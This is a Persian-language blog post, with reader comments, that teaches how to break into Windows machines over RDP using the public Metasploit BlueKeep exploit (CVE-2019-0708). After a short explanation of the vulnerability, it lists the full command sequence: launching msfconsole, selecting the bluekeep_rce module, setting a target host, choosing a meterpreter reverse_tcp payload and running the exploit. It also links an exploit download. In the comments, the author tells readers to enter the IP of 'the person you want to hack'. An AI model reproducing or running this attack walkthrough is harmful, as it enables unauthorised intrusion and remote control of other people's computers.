0
02128428905

آموزش نفوذ به ویندوز از طریق RDP با اکسپلویت BlueKeep

 

سلام خدمت تمامی کاربران گل سایت تیم امنیتی اولترا

 

سیستم عامل ویندوز یک سیستم عامل بسیار پراستفاده در ایران و کشور های دیگر است ، که در ایران بیشتر سازمان ها و مراکز دولتی از سیستم عامل ویندوز استفاده میکنن ، شما هر جایی قدم بزارید غیرممکنه که سیستم عامل ویندوز رو نبینید ، این حجم زیاد استفاده از سیستم عامل ویندوز هم خوب نیست چون اگر آسیب پذیری از این سیستم عامل کشف بشه سیستم های زیادی رو تحت تاثیر قرار میده که بسیار خطرناکه ، تا به امروز آسیب پذیری های زیاد و مختلفی برای ویندوز کشف شده که ما در این پست میخواهیم به یکی از جدیدترین آسیب پذیری ها برای سیستم عامل ویندوز بپردازیم.

 

 

توضیحاتی راجب آسیب پذیری BlueKeep :

 

در سال ۲۰۱۹ آسیب پذیری از نوع User After Free در سرویس RDP ویندوز کشف شد ، این آسیب پذیری تمامی نسخه های ویندوز رو تحت تاثیر خودش قرار میداد و برروی سرویسی هم بود که خیلی زیاد توسط افراد استفاده میشد ، اکسپلویت این آسیب پذیری پابلیک نشده بود و دست افراد خاصی بود تا اینکه دو روز پیش  اکسپلویت مربوط به این آسیب پدیری پابلیک شد، خبر خوب اینه که این اکسپلویت برای متااسپلویت توسعه داده شده و شما به راحتی میتونید از این اکسپلویت استفاده کنید.

 

 

 

 

 

 

 

خب بریم سراغ کارمون

 

با دستور زیر متااسپلویت رو اجرا میکنیم

 

 

msfconsole

 

 

بعد از اجرای متااسپلویت با دستور زیر اکسپلویت  BlueKeep رو انتخاب میکنیم (اکسپلویت BlueKeep رو میتونید از این  لینک دانلود کنید)

 

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

 

 

بعد از انتخاب اکسپلویت با دستور زیر ای پی سیستمی که میخواهیم بهش نفوذ کنیم رو به متااسپلویت میدیم

 

set RHOSTS 192.168.1.2

 

 

با دستور زیر یک پیلود انتخاب میکنیم

 

set PAYLOAD windows/meterpreter/reverse_tcp

 

 

با دستور زیر تارگت رو انتخاب میکنیم این اکسپلویت فعلا فقط روی Windows 7 and Windows Server 2008 R2 کار میکنه پس شما باید بسته به نوع سیستم عامل تارگت یکی از گزینه ها رو انتخاب کنید

 

set TARGET 2

 

 

خب کار تمومه با دستور exploit اکسپلویت رو اجرا میکنیم و منتظر میمونیم تا دسترسی ما برقرار بشه

 

 

 

عنوان دانلود : دانلود اکسپلویت BlueKeep
دیدگاه کاربران
  • سعادتی 9 سپتامبر 2019

    ببخشید مه همی لینک ره دانلود نتوانستم لطفا بگوید از لینک چگونه استفاده کنم؟ چگونه دانلود کنم؟

    • اشکان مقدس 13 سپتامبر 2019

      سلام

      شما باید اکسپلویت رو به متااسپلویت اضافه کنید بعد استفاده کنید

  • Ali 6 ژوئن 2020

    ببخشید چه ایپی رو وارد کنیم؟

    • اشکان مقدس 7 ژوئن 2020

      سلام

      ایپی سیستم شخصی که میخواهید هکش کنید

  • Ali 8 ژوئن 2020

    سلام میدونم منظورم اینه چه نوع ایپی رو بدیم |

    • اشکان مقدس 8 ژوئن 2020

      اگر تارگت در شبکه داخلی شما هست ای پی پرایویت و اگر در شبکه اینترنت هست ای پی پابلیک تارگت رو وارد کنید

  • محمد 22 جولای 2020

    میشه این روش رو روی کالی مجازی امتحان کرد؟؟؟

ارسال دیدگاه

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *